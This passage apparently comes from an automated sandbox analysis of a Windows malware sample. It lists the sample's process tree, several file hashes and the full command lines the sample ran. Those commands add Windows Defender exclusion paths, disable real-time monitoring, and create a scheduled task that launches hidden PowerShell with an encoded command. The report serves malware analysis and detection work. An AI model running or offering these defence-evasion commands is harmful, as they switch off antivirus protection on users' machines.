          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:64
          PID: 2016
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:32
          PID: 3008
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:64
          PID: 772
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:32
          PID: 2556
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:64
          PID: 2836
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:32
          PID: 2792
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:64
          PID: 2476
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:32
          PID: 892
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:64
          PID: 1596
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
          PID: 2616
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:64
          PID: 2064
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:32
          PID: 2928
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          PID: 760
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          PID: 2840
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:64
          PID: 1692
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:32
          PID: 2756
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:64
          PID: 1656
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:32
          PID: 1376
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:64
          PID: 2252
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:32
          PID: 2072
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:64
          PID: 2412
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:32
          PID: 2400
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:64
        PID: 1588
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "gaFtpSRup"
        PID: 3004
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "gaFtpSRup" /SC once /ST 17:40:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        PID: 1944
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
        PID: 2680
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:64
        PID: 2708
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2124
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:641⤵
- Modifies Windows Defender Real-time Protection settings
PID:952
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2468
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:321⤵PID:1648
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:641⤵PID:2804
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "303402502-17147885563196457681702126387126727367-1997115842-13115463071087322843"1⤵PID:1660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10341538901392894401-8757807511898178787120762267728448201310902796291051527832"1⤵PID:2384
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1212
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "823407083-1296150777-19760549141405620939-387368756768100271290963101463530343"1⤵
- Drops file in Windows directory
PID:2208
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:641⤵
- Windows security bypass
PID:2656
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 6.1MB
MD5 271b4c62b67f85e2dfa800a406fefd86
SHA1 d0bf4731837c22399c435a93dde7416ab0255297
SHA256 4000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA512 3aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize 6.1MB
MD5 271b4c62b67f85e2dfa800a406fefd86
SHA1 d0bf4731837c22399c435a93dde7416ab0255297
SHA256 4000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA512 3aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 1d04a7af85c8c41960456a01ba1c9baf
SHA1 84f128c1c3404873f7b3428635e2fcab1fde8a2e
SHA256 1a96a85c267662334632bed702e9f1883a33a2c596dcd4730f9133173f17ae3a
SHA512 1fbd7432d1d84299d624c47225b458a81ec72a78d2efc01f3bcdf7e52da523da5efdaff7279160db45a8ddc2387c1f6f39f02a0a803b340bff2ba6294a4c3504
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 933340831dd6fb791001c6d67adb18ee
SHA1 ed5413c030287b51190a7f55802e4cc97bc6cce1
SHA256 ec8b63bcefed9d2daf407a1c0dd390e4c7049ceb99d0cbfd3880afc5a60cd7a3
SHA512 045537a93759cecea0b9ab8b03302eda4a0ec85e2e183a645b9336817427b157a070695c646b2fc768fe9ea8dc3c6dff61d0d2b7d08685536dba7ecf8ff8b18c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 b6b54dc6d1f0f9ead39156c924bf8a3d
SHA1 da58d0252f3a6540cde3de4818b5b649f29c8a18
SHA256 ddfd593a5a4f2179cf498546ffae1c63749a59d801d92169398c047a58a18ee5
SHA512 82a3ac8e8141e4bdb1e0b225724866ae5a2bcaf7d12972bff3234c27c1a9ea3d9274109b3c080c68648354407829009f9ec459f2c803129af610ad3a46d47594
-
Filesize 9KB
MD5 4cdc1b066431a6e1477defe20137ad08
SHA1 a58f4ac7343c9741a1fa675d4658a2af96dcacd1
SHA256 97b132755de4e5ab992900956be4fc6ae8b528c056c2279b286bbebdc5a201fb
SHA512 01e468ebd9d5b839585391767b3c37e99acab8efeff3b23ae4fbf7cf2323fac439477ae34152b45d942a0dea7ac287f086548d1372dfc69a4b7ec6f404ffbb89
-
Filesize 268B
MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize 6.1MB
MD5 271b4c62b67f85e2dfa800a406fefd86
SHA1 d0bf4731837c22399c435a93dde7416ab0255297
SHA256 4000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA512 3aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize 6.1MB
MD5 271b4c62b67f85e2dfa800a406fefd86
SHA1 d0bf4731837c22399c435a93dde7416ab0255297
SHA256 4000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA512 3aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize 6.1MB
MD5 271b4c62b67f85e2dfa800a406fefd86
SHA1 d0bf4731837c22399c435a93dde7416ab0255297
SHA256 4000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA512 3aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize 6.1MB
MD5 271b4c62b67f85e2dfa800a406fefd86
SHA1 d0bf4731837c22399c435a93dde7416ab0255297
SHA256 4000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA512 3aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize 6.9MB
MD5 6b7269665d6d4db4cb0b5982cc6decc3
SHA1 5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0